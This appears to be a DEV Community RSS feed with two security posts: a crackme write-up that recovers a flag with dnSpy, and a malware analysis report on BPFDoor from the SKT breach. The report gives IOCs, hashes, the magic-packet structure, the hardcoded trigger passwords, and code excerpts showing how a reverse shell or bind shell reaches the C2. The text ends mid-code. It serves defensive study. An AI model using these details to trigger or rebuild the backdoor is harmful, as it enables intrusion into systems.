DEV Community: The Rusty The latest articles on DEV Community by The Rusty (@therustymate). https://dev.to/therustymate https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3268323%2Fbfcfb665-bcc7-4171-bc1e-cba88cdfebef.jpeg DEV Community: The Rusty https://dev.to/therustymate en MarcusHindey's Crackme protect The Rusty Mon, 16 Jun 2025 10:31:20 +0000 https://dev.to/therustymate/marcushindeys-crackme-protect-2mh5 https://dev.to/therustymate/marcushindeys-crackme-protect-2mh5 <h1> MarcusHindey's Crackme protect </h1> <p>Since <code>ILSpy</code> failed to decompile the code, I will proceed with dynamic analysis using <code>dnSpy</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdz6p4fpt09sfuy67plmo.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdz6p4fpt09sfuy67plmo.png" alt=" " width="800" height="64"></a></p> <h2> Entry Point </h2> <p>Since <code>ILSpy</code> failed to fully decompile the application, a clear entry point could not be identified. Therefore, I will perform dynamic analysis using a <strong>Windows 10 virtual machine and <code>dnSpy</code></strong>.</p> <p>However, I was able to <u>identify a working portion of the code</u> that includes a class of the <strong>Form</strong> type. This confirms that the application is a <code>WinForms</code> program developed using a specific IDE. Additionally, it has been confirmed that the code involves <u>string encryption and obfuscation techniques</u>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight csharp"><code><span class="k">namespace</span> <span class="nn">crackme</span> <span class="p">{</span> <span class="k">public</span> <span class="k">class</span> <span class="nc">CrackMarcuza_002DProtect_002D9DD71ADEL2</span> <span class="p">:</span> <span class="n">Form</span> <span class="p">{</span> <span class="p">...</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <h2> Dynamic Analysis </h2> <p>As a result of attempting decompilation and debugging using <code>dnSpy</code> on a Windows 10 virtual machine in <code>VirtualBox</code>, I discovered a new variable named <code>flag</code> (<code>bool</code>) that was not visible in <code>ILSpy</code>.</p> <p><code>CrackMarcuza-Protect-9DD71ADEL2.cs</code><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight csharp"><code><span class="k">private</span> <span class="k">void</span> <span class="n">Cra</span><span class="p">...(</span><span class="kt">object</span> <span class="n">CrackMarc</span><span class="p">...,</span> <span class="n">EventArgs</span> <span class="n">CrackMa</span><span class="p">...)</span> <span class="p">{</span> <span class="p">...</span> <span class="kt">bool</span> <span class="n">flag</span> <span class="p">=</span> <span class="n">CrackMarcuza</span><span class="p">-</span><span class="n">Protect</span><span class="p">-</span><span class="m">9D</span><span class="n">D71ADEL2</span><span class="p">.</span><span class="n">CrackM</span><span class="p">...</span> <span class="p">...</span> <span class="p">}</span> </code></pre> </div> <p>This variable stores the result of comparing the string entered by the user in <code>CrackMarcuza-Protect-2E9E89G659</code> (<code>TextBox</code>) with a value processed using the <code>CrackMarcuza-Protect-224C999FHE</code> method from the <code>CrackMarcuza-Protect-9DD71ADEL2</code> class.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight csharp"><code><span class="kt">bool</span> <span class="n">flag</span> <span class="p">=</span> <span class="n">CrackMarcuza</span><span class="p">-</span><span class="n">Protect</span><span class="p">-</span><span class="m">9D</span><span class="n">D71ADEL2</span><span class="p">.</span><span class="n">CrackMarcuza</span><span class="p">-</span><span class="n">Protect</span><span class="p">-</span><span class="m">224</span><span class="nf">C999FHE</span><span class="p">(</span> <span class="k">this</span><span class="p">.</span><span class="n">CrackMarcuza</span><span class="p">-</span><span class="n">Protect</span><span class="p">-</span><span class="m">2E9</span><span class="n">E89G659</span><span class="p">.</span><span class="n">Text</span><span class="p">,</span> <span class="n">CrackMarcuza</span><span class="p">-</span><span class="n">Protect</span><span class="p">-</span><span class="m">0L69</span><span class="n">ACE66B</span><span class="p">.</span><span class="n">CrackMarcuza</span><span class="p">-</span><span class="n">Protect</span><span class="p">-</span><span class="m">4</span><span class="nf">G3C3EA4G0</span><span class="p">(</span> <span class="n">CrackMarcuza</span><span class="p">-</span><span class="n">Protect</span><span class="p">-</span><span class="m">0L69</span><span class="n">ACE66B</span><span class="p">.</span><span class="n">VaultVM</span><span class="p">-</span><span class="n">Protect</span><span class="p">-</span><span class="n">HEA399LELD</span><span class="p">,</span> <span class="n">CrackMarcuza</span><span class="p">-</span><span class="n">Protect</span><span class="p">-</span><span class="m">0L69</span><span class="n">ACE66B</span><span class="p">.</span><span class="n">VaultVM</span><span class="p">-</span><span class="n">Protect</span><span class="p">-</span><span class="n">DC9G166B72</span> <span class="p">)</span> <span class="p">);</span> </code></pre> </div> <p>First, when decompiling the <code>CrackMarcuza-Protect-224C999FHE</code> function, the following code is obtained:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight csharp"><code><span class="k">public</span> <span class="k">static</span> <span class="kt">bool</span> <span class="n">CrackMarcuza</span><span class="p">-</span><span class="n">Protect</span><span class="p">-</span><span class="m">224</span><span class="nf">C999FHE</span><span class="p">(</span><span class="kt">string</span> <span class="n">A_0</span><span class="p">,</span> <span class="kt">string</span> <span class="n">A_1</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="n">A_0</span> <span class="p">==</span> <span class="n">A_1</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p>This function performs a simple equality check, similar to the <code>Equals()</code> method or the <code>==</code> operator in C#. It compares <code>param1</code> (<code>A_0</code>) and <code>param2</code> (<code>A_1</code>), returning <code>true</code> if they are equal and <code>false</code> if they are not.</p> <p>This means that when the actual variables are compared in memory, <strong>the encrypted string is decrypted at runtime</strong> before the comparison takes place, and the result is then processed accordingly.</p> <p>Therefore, I will set a <strong>breakpoint</strong> in the function <code>CrackMarcuza-Protect-4G3C3EA4G0</code>, which processes the second argument (<code>A_1</code>), in an attempt to capture the actual flag at runtime.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight csharp"><code><span class="k">public</span> <span class="k">static</span> <span class="kt">string</span> <span class="n">CrackMarcuza</span><span class="p">-</span><span class="n">Protect</span><span class="p">-</span><span class="m">4</span><span class="nf">G3C3EA4G0</span><span class="p">(</span><span class="kt">string</span> <span class="n">A_0</span><span class="p">,</span> <span class="kt">int</span> <span class="n">A_1</span><span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="n">Assembly</span><span class="p">.</span><span class="nf">GetExecutingAssembly</span><span class="p">().</span><span class="n">FullName</span> <span class="p">==</span> <span class="n">Assembly</span><span class="p">.</span><span class="nf">GetCallingAssembly</span><span class="p">().</span><span class="n">FullName</span><span class="p">)</span> <span class="p">{</span> <span class="n">StringBuilder</span> <span class="n">stringBuilder</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">StringBuilder</span><span class="p">();</span> <span class="k">foreach</span> <span class="p">(</span><span class="kt">char</span> <span class="n">c</span> <span class="k">in</span> <span class="n">A_0</span><span class="p">)</span> <span class="p">{</span> <span class="n">stringBuilder</span><span class="p">.</span><span class="nf">Append</span><span class="p">((</span><span class="kt">char</span><span class="p">)((</span><span class="kt">int</span><span class="p">)((</span><span class="kt">ulong</span><span class="p">)((</span><span class="kt">ushort</span><span class="p">)((</span><span class="kt">short</span><span class="p">)</span><span class="n">c</span><span class="p">)))</span> <span class="p">^</span> <span class="n">A_1</span><span class="p">));</span> <span class="p">}</span> <span class="k">return</span> <span class="n">stringBuilder</span><span class="p">.</span><span class="nf">ToString</span><span class="p">();</span> <span class="c1">// Breakpoint</span> <span class="p">}</span> <span class="k">return</span> <span class="k">null</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq66vlv020ndu4lw9r778.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq66vlv020ndu4lw9r778.png" alt=" " width="722" height="367"></a></p> <p>By inspecting the actual value returned by the <code>CrackMarcuza-Protect-4G3C3EA4G0</code> function, which returns a <code>StringBuilder</code> object, the result is as follows:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl3kys0fznj8puys6qhh4.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl3kys0fznj8puys6qhh4.png" alt=" " width="800" height="114"></a></p> <p>It can be confirmed that the <code>stringBuilder</code> object contains the value <code>{m4rcuzCrack}</code>.</p> <h2> Flag </h2> <p>Therefore, the final flag of this program is as follows: <code>m4rcuzCrack</code></p> analytics csharp dotnet MAL-250608-01-01 The Rusty Mon, 16 Jun 2025 10:00:56 +0000 https://dev.to/therustymate/mal-250608-01-01-2ep4 https://dev.to/therustymate/mal-250608-01-01-2ep4 <h1> MAL-250608-01-01 </h1> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Metadata</th> <th>Information</th> </tr> </thead> <tbody> <tr> <td>Report ID</td> <td>MAL-250608-01-01</td> </tr> <tr> <td>Incident Date</td> <td>2022-06/15 - 2025-04/22</td> </tr> <tr> <td>Report Date</td> <td>2025-06/08</td> </tr> <tr> <td>Malware Name</td> <td>BPFDoor</td> </tr> <tr> <td>Version</td> <td>01</td> </tr> <tr> <td>Analyst</td> <td><a class="mentioned-user" href="https://dev.to/therustymate">@therustymate</a></td> </tr> <tr> <td>Organization</td> <td>Private</td> </tr> <tr> <td>Severity</td> <td>Critical</td> </tr> <tr> <td>Status</td> <td>Public/Draft</td> </tr> <tr> <td>Malware Type</td> <td>RAT</td> </tr> <tr> <td>Detection Date</td> <td>2025-04/18 06:09 PM</td> </tr> <tr> <td>Affected Systems</td> <td>Linux/HSS</td> </tr> <tr> <td>CVE</td> <td>N/A</td> </tr> <tr> <td>Tags</td> <td>Backdoor, ISP Hacking</td> </tr> </tbody> </table></div> <h2> Incident Report </h2> <p>In the recent SKT cyberattack, threat actors gained initial access via a <u>web shell</u> from the external network, then penetrated into the internal network and deployed <strong><em>BPFdoor</em></strong> malware to compromise Linux-based HSS (Home Subscriber Server) systems. Approximately <strong>9.8GB</strong> of sensitive data (ex. IMSI) was exfiltrated during the intrusion.</p> <h3> Incident Metadata </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Metadata</th> <th>Information</th> </tr> </thead> <tbody> <tr> <td>Command &amp; Control (C2) Server</td> <td>165.232.174[.]130</td> </tr> <tr> <td>Indicators of Compromise</td> <td>165.232.174[.]130</td> </tr> <tr> <td>Infection Vector</td> <td>WebShell</td> </tr> <tr> <td>Persistence Mechanisms</td> <td>BPF-based direct kernel code execution</td> </tr> <tr> <td></td> <td>Raw socket-based custom packet trigger mechanism</td> </tr> <tr> <td>Payload Description</td> <td>Backdoor</td> </tr> <tr> <td>Network Behavior</td> <td>Custom Packet Communication</td> </tr> </tbody> </table></div> <h3> File Names </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>File Name</th> <th>Size</th> </tr> </thead> <tbody> <tr> <td>dbus-srv</td> <td>34KB</td> </tr> <tr> <td>inode262394</td> <td>28KB</td> </tr> <tr> <td>dbus-srv</td> <td>34KB</td> </tr> <tr> <td>dbus-srv</td> <td>34KB</td> </tr> <tr> <td>dbus-srv</td> <td>34KB</td> </tr> <tr> <td>File_in_Inode_#1900667</td> <td>28KB</td> </tr> <tr> <td>gm</td> <td>2,063KB</td> </tr> <tr> <td>rad</td> <td>22KB</td> </tr> </tbody> </table></div> <h3> Hashes </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>File Name</th> <th>Hash Type</th> <th>Hash</th> </tr> </thead> <tbody> <tr> <td>hpasmmld</td> <td>MD5</td> <td>a47d96ffe446a431a46a3ea3d1ab4d6e</td> </tr> <tr> <td></td> <td>SHA1</td> <td>e6ccf59c2b7f6bd0f143cde356f60d2217120ad2</td> </tr> <tr> <td></td> <td>SHA256</td> <td>c7f693f7f85b01a8c0e561bd369845f40bff423b0743c7aa0f4c323d9133b5d4</td> </tr> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td>smartadm</td> <td>MD5</td> <td>227fa46cf2a4517aa1870a011c79eb54</td> </tr> <tr> <td></td> <td>SHA1</td> <td>466527d15744cdbb6e1d71129e1798acbe95764d</td> </tr> <tr> <td></td> <td>SHA256</td> <td>3f6f108db37d18519f47c5e4182e5e33cc795564f286ae770aa03372133d15c4</td> </tr> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td>hald-addon-volume</td> <td>MD5</td> <td>f4ae0f1204e25a17b2adbbab838097bd</td> </tr> <tr> <td></td> <td>SHA1</td> <td>e3399ea3ebbbd47c588ae807c4bd429f6eef8deb</td> </tr> <tr> <td></td> <td>SHA256</td> <td>95fd8a70c4b18a9a669fec6eb82dac0ba6a9236ac42a5ecde270330b66f51595</td> </tr> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td>dbus-srv-bin.txt</td> <td>MD5</td> <td>714165b06a462c9ed3d145bc56054566</td> </tr> <tr> <td></td> <td>SHA1</td> <td>2ca9a29b139b7b2993cabf025b34ead957dee08b</td> </tr> <tr> <td></td> <td>SHA256</td> <td>aa779e83ff5271d3f2d270eaed16751a109eb722fca61465d86317e03bbf49e4</td> </tr> <tr> <td>dbus-srv</td> <td>MD5</td> <td>3c54d788de1bf6bd2e7bc7af39270540</td> </tr> <tr> <td></td> <td>SHA1</td> <td>67a3a1f8338262cd9c948c6e55a22e7d9070ca6c</td> </tr> <tr> <td></td> <td>SHA256</td> <td>925ec4e617adc81d6fcee60876f6b878e0313a11f25526179716a90c3b743173</td> </tr> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td>inode262394</td> <td>MD5</td> <td>fbe4d008a79f09c2d46b0bcb1ba926b3</td> </tr> <tr> <td></td> <td>SHA1</td> <td>0f12ab32bac3f4db543f702d58368f20b6f5d324</td> </tr> <tr> <td></td> <td>SHA256</td> <td>29564c19a15b06dd5be2a73d7543288f5b4e9e6668bbd5e48d3093fb6ddf1fdb</td> </tr> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td>dbus-srv</td> <td>MD5</td> <td>c2415a464ce17d54b01fc91805f68967</td> </tr> <tr> <td></td> <td>SHA1</td> <td>4b6824ed764822dc422384cec89d45bbc682ef09</td> </tr> <tr> <td></td> <td>SHA256</td> <td>be7d952d37812b7482c1d770433a499372fde7254981ce2e8e974a67f6a088b5</td> </tr> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td>dbus-srv</td> <td>MD5</td> <td>aba893ffb1179b2a0530fe4f0daf94da</td> </tr> <tr> <td></td> <td>SHA1</td> <td>213dbb5862a19a423e5b10789a07ee163ab71969</td> </tr> <tr> <td></td> <td>SHA256</td> <td>027b1fed1b8213b86d8faebf51879ccc9b1afec7176e31354fbac695e8daf416</td> </tr> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td>dbus-srv</td> <td>MD5</td> <td>e2c2f1a1fbd66b4973c0373200130676</td> </tr> <tr> <td></td> <td>SHA1</td> <td>7e7234c5e94a92dd8f43632aca1ac60db7d96d56</td> </tr> <tr> <td></td> <td>SHA256</td> <td>a2ea82b3f5be30916c4a00a7759aa6ec1ae6ddadc4d82b3481640d8f6a325d59</td> </tr> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td>File_in_Inode_#1900667</td> <td>MD5</td> <td>dc3361ce344917da20f1b8cb4ae0b31d</td> </tr> <tr> <td></td> <td>SHA1</td> <td>c2717777ba2cb9a698889fca884eb7650144f32e</td> </tr> <tr> <td></td> <td>SHA256</td> <td>e04586672874685b019e9120fcd1509d68af6f9bc513e739575fc73edefd511d</td> </tr> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td>gm</td> <td>MD5</td> <td>a778d7ad5a23a177f2d348a0ae4099772c09671e</td> </tr> <tr> <td></td> <td>SHA1</td> <td>c2717777ba2cb9a698889fca884eb7650144f32e</td> </tr> <tr> <td></td> <td>SHA256</td> <td>adfdd11d69f4e971c87ca5b2073682d90118c0b3a3a9f5fbbda872ab1fb335c6</td> </tr> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td>rad</td> <td>MD5</td> <td>0bcd4f14e7d8a3dc908b5c17183269a4</td> </tr> <tr> <td></td> <td>SHA1</td> <td>b631d5ed10d0b2c7d9c39f43402cccde7f3cb5ea</td> </tr> <tr> <td></td> <td>SHA256</td> <td>7c39f3c3120e35b8ab89181f191f01e2556ca558475a2803cb1f02c05c830423</td> </tr> </tbody> </table></div> <h3> References </h3> <p><strong>!!!WARNING!!!</strong> Some references may not be fully reliable.<br> <a href="https://boho.or.kr/kr/bbs/view.do?bbsId=B0000133&amp;menuNo=205020&amp;nttId=71735" rel="noopener noreferrer">KISA</a><br> <a href="https://namu.wiki/w/SK%ED%85%94%EB%A0%88%EC%BD%A4%20%EC%9C%A0%EC%8B%AC%20%EC%A0%95%EB%B3%B4%20%EC%9C%A0%EC%B6%9C%20%EC%82%AC%EA%B3%A0" rel="noopener noreferrer">Namu Wiki</a><br> <a href="https://www.korea.kr/briefing/policyBriefingView.do?newsId=156689741#:~:text=1%EC%B0%A8%20%EB%B0%9C%ED%91%9C%20%EC%9D%B4%ED%9B%84%20%EA%B3%B5%EA%B2%A9,%EC%9D%84%20%EC%99%84%EB%A3%8C%ED%95%A0%20%EC%98%88%EC%A0%95%EC%9E%85%EB%8B%88%EB%8B%A4." rel="noopener noreferrer">korea.kr</a></p> <h2> Analysis </h2> <h3> Function/Symbol Table </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Function</th> <th>Hex Location</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td><code>xchg()</code></td> <td>Unknown</td> <td>Exchange <code>a</code> and <code>b</code> in memory</td> </tr> <tr> <td><code>rc4_init()</code></td> <td>Unknown</td> <td>Initialize RC4 encryption algorithm</td> </tr> <tr> <td><code>rc4()</code></td> <td>Unknown</td> <td>Perform RC4 encryption</td> </tr> <tr> <td><code>cwrite()</code></td> <td>Unknown</td> <td>Cipher writer</td> </tr> <tr> <td><code>cread()</code></td> <td>Unknown</td> <td>Cipher reader</td> </tr> <tr> <td><code>remove_pid()</code></td> <td>Unknown</td> <td>Unlink (delete) <code>pid_path</code> file</td> </tr> <tr> <td><code>setup_time()</code></td> <td>Unknown</td> <td>File timestamp manipulation (<code>1225394236</code> sec)</td> </tr> <tr> <td><code>terminate()</code></td> <td>Unknown</td> <td>Process termination event</td> </tr> <tr> <td><code>on_terminate()</code></td> <td>Unknown</td> <td> <code>SIGTERM</code> (Process termination) event handler</td> </tr> <tr> <td><code>init_signal()</code></td> <td>Unknown</td> <td>Process termination event setup</td> </tr> <tr> <td><code>sig_child()</code></td> <td>Unknown</td> <td>Child process termination event setup/handler</td> </tr> <tr> <td><code>ptym_open()</code></td> <td>Unknown</td> <td>Spawn a pseudo terminal master (virtual terminal)</td> </tr> <tr> <td><code>ptys_open()</code></td> <td>Unknown</td> <td>Spawn a pseudo terminal slave (PTYM input object)</td> </tr> <tr> <td><code>open_tty()</code></td> <td>Unknown</td> <td>Create a teletypewriter (terminal interface)</td> </tr> <tr> <td><code>try_link()</code></td> <td>Unknown</td> <td>Spawn a socket client object (reverse shell)</td> </tr> <tr> <td><code>mon()</code></td> <td>Unknown</td> <td>Return <code>"1"</code> to the remote server (failed signal)</td> </tr> <tr> <td><code>set_proc_name()</code></td> <td>Unknown</td> <td>Manipulate a process name through prctl syscall</td> </tr> <tr> <td><code>to_open()</code></td> <td>Unknown</td> <td>Check the access permision for the shell</td> </tr> <tr> <td><code>logon()</code></td> <td>Unknown</td> <td>Password verification and command handler</td> </tr> <tr> <td><code>packet_loop()</code></td> <td>Unknown</td> <td>TCP, UDP, ICMP packet parser and handler</td> </tr> <tr> <td><code>b()</code></td> <td>Unknown</td> <td>Spawn a socket bind server (random port)</td> </tr> <tr> <td><code>w()</code></td> <td>Unknown</td> <td>Accept connections</td> </tr> <tr> <td><code>getshell()</code></td> <td>Unknown</td> <td>Disable firewall and spawn a bind server</td> </tr> <tr> <td><code>shell()</code></td> <td>Unknown</td> <td>Core command handler</td> </tr> <tr> <td><code>main()</code></td> <td>Unknown</td> <td>Entry point with configs</td> </tr> </tbody> </table></div> <h3> Magic Packet </h3> <p>The following code is the C structure of the magic packet used to activate BPFDoor.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="k">struct</span> <span class="n">magic_packet</span><span class="p">{</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flag</span><span class="p">;</span> <span class="n">in_addr_t</span> <span class="n">ip</span><span class="p">;</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">port</span><span class="p">;</span> <span class="kt">char</span> <span class="n">pass</span><span class="p">[</span><span class="mi">14</span><span class="p">];</span> <span class="p">}</span> <span class="n">__attribute__</span> <span class="p">((</span><span class="n">packed</span><span class="p">));</span> </code></pre> </div> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Field</th> <th>Field Type</th> <th>Length</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>flag</td> <td><code>unsigned int</code></td> <td>4 bytes</td> <td>Not Used</td> </tr> <tr> <td>ip</td> <td><code>in_addr_t</code></td> <td>4 bytes</td> <td>C2 Server IPv4 Address</td> </tr> <tr> <td>port</td> <td><code>unsigned short</code></td> <td>2 bytes</td> <td>C2 Server Port Number</td> </tr> <tr> <td>pass</td> <td><code>char [14]</code></td> <td>14 bytes</td> <td>Password/Command</td> </tr> </tbody> </table></div> <p>The following C code parses custom magic packets delivered over TCP, UDP, and ICMP protocols. This indicates that BPFDoor is capable of establishing remote connections through packets using <strong>TCP</strong>, <strong>UDP</strong>, and <strong>ICMP</strong>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="k">switch</span><span class="p">(</span><span class="n">ip</span><span class="o">-&gt;</span><span class="n">ip_p</span><span class="p">)</span> <span class="p">{</span> <span class="k">case</span> <span class="n">IPPROTO_TCP</span><span class="p">:</span> <span class="n">tcp</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sniff_tcp</span><span class="o">*</span><span class="p">)(</span><span class="n">buff</span><span class="o">+</span><span class="mi">14</span><span class="o">+</span><span class="n">size_ip</span><span class="p">);</span> <span class="n">size_tcp</span> <span class="o">=</span> <span class="n">TH_OFF</span><span class="p">(</span><span class="n">tcp</span><span class="p">)</span><span class="o">*</span><span class="mi">4</span><span class="p">;</span> <span class="n">mp</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">magic_packet</span> <span class="o">*</span><span class="p">)(</span><span class="n">buff</span><span class="o">+</span><span class="mi">14</span><span class="o">+</span><span class="n">size_ip</span><span class="o">+</span><span class="n">size_tcp</span><span class="p">);</span> <span class="k">break</span><span class="p">;</span> <span class="k">case</span> <span class="n">IPPROTO_UDP</span><span class="p">:</span> <span class="n">udp</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sniff_udp</span> <span class="o">*</span><span class="p">)(</span><span class="n">ip</span><span class="o">+</span><span class="mi">1</span><span class="p">);</span> <span class="n">mp</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">magic_packet</span> <span class="o">*</span><span class="p">)(</span><span class="n">udp</span><span class="o">+</span><span class="mi">1</span><span class="p">);</span> <span class="k">break</span><span class="p">;</span> <span class="k">case</span> <span class="n">IPPROTO_ICMP</span><span class="p">:</span> <span class="n">pbuff</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)(</span><span class="n">ip</span><span class="o">+</span><span class="mi">1</span><span class="p">);</span> <span class="n">mp</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">magic_packet</span> <span class="o">*</span><span class="p">)(</span><span class="n">pbuff</span><span class="o">+</span><span class="mi">8</span><span class="p">);</span> <span class="k">break</span><span class="p">;</span> <span class="nl">default:</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <h3> Login Password </h3> <p>The login passwords received by the malware are as follows:</p> <ul> <li>justforfun</li> <li>socket </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="p">{</span><span class="mh">0x6a</span><span class="p">,</span> <span class="mh">0x75</span><span class="p">,</span> <span class="mh">0x73</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x66</span><span class="p">,</span> <span class="mh">0x6f</span><span class="p">,</span> <span class="mh">0x72</span><span class="p">,</span> <span class="mh">0x66</span><span class="p">,</span> <span class="mh">0x75</span><span class="p">,</span> <span class="mh">0x6e</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">};</span> <span class="c1">// justforfun</span> <span class="p">{</span><span class="mh">0x73</span><span class="p">,</span> <span class="mh">0x6f</span><span class="p">,</span> <span class="mh">0x63</span><span class="p">,</span> <span class="mh">0x6b</span><span class="p">,</span> <span class="mh">0x65</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">};</span> <span class="c1">// socket</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">data</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0x6a</span><span class="p">,</span> <span class="mh">0x75</span><span class="p">,</span> <span class="mh">0x73</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x66</span><span class="p">,</span> <span class="mh">0x6f</span><span class="p">,</span> <span class="mh">0x72</span><span class="p">,</span> <span class="mh">0x66</span><span class="p">,</span> <span class="mh">0x75</span><span class="p">,</span> <span class="mh">0x6e</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="nf">chr</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="n">end</span><span class="o">=</span><span class="sh">''</span><span class="p">)</span> <span class="o">&gt;&gt;&gt;</span> <span class="n">justforfun</span> <span class="n">data2</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0x73</span><span class="p">,</span> <span class="mh">0x6f</span><span class="p">,</span> <span class="mh">0x63</span><span class="p">,</span> <span class="mh">0x6b</span><span class="p">,</span> <span class="mh">0x65</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">data2</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="nf">chr</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="n">end</span><span class="o">=</span><span class="sh">''</span><span class="p">)</span> <span class="o">&gt;&gt;&gt;</span> <span class="n">socket</span> </code></pre> </div> <p>If the transmitted value is <strong>"justforfun"</strong>, the malware establishes a TCP reverse shell to connect back to the C2 server.</p> <ul> <li><p>The function <code>try_link()</code> returns a TCP client socket object, which is stored in the variable <code>scli</code>.</p></li> <li><p>This <code>scli</code> object is then passed as an argument to the <code>shell()</code> function.</p></li> </ul> <p>If the transmitted value is <strong>"socket"</strong>, the malware sets up a bind shell server, listening for incoming connections.</p> <ul> <li><p>The function <code>getshell()</code> calls another function <code>b()</code>, which returns a TCP listening socket (bind server).</p></li> <li><p>The resulting socket is stored in the variable <code>sockfd</code>, which is then passed as an argument to the <code>shell()</code> function.</p></li> </ul> <p>In summary, the command structure of this malware operates as follows:</p> <ul> <li> <code>justforfun</code> command → Spawns a <strong>reverse shell</strong> </li> <li> <code>socket</code> command → Spawns a <strong>bind shell</strong> </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="n">cmp</span> <span class="o">=</span> <span class="n">logon</span><span class="p">(</span><span class="n">mp</span><span class="o">-&gt;</span><span class="n">pass</span><span class="p">);</span> <span class="c1">// Check the command</span> <span class="k">switch</span><span class="p">(</span><span class="n">cmp</span><span class="p">)</span> <span class="p">{</span> <span class="k">case</span> <span class="mi">1</span><span class="p">:</span> <span class="n">strcpy</span><span class="p">(</span><span class="n">sip</span><span class="p">,</span> <span class="n">inet_ntoa</span><span class="p">(</span><span class="n">ip</span><span class="o">-&gt;</span><span class="n">ip_src</span><span class="p">));</span> <span class="n">getshell</span><span class="p">(</span><span class="n">sip</span><span class="p">,</span> <span class="n">ntohs</span><span class="p">(</span><span class="n">tcp</span><span class="o">-&gt;</span><span class="n">th_dport</span><span class="p">));</span> <span class="k">break</span><span class="p">;</span> <span class="k">case</span> <span class="mi">0</span><span class="p">:</span> <span class="n">scli</span> <span class="o">=</span> <span class="n">try_link</span><span class="p">(</span><span class="n">bip</span><span class="p">,</span> <span class="n">mp</span><span class="o">-&gt;</span><span class="n">port</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">scli</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="n">shell</span><span 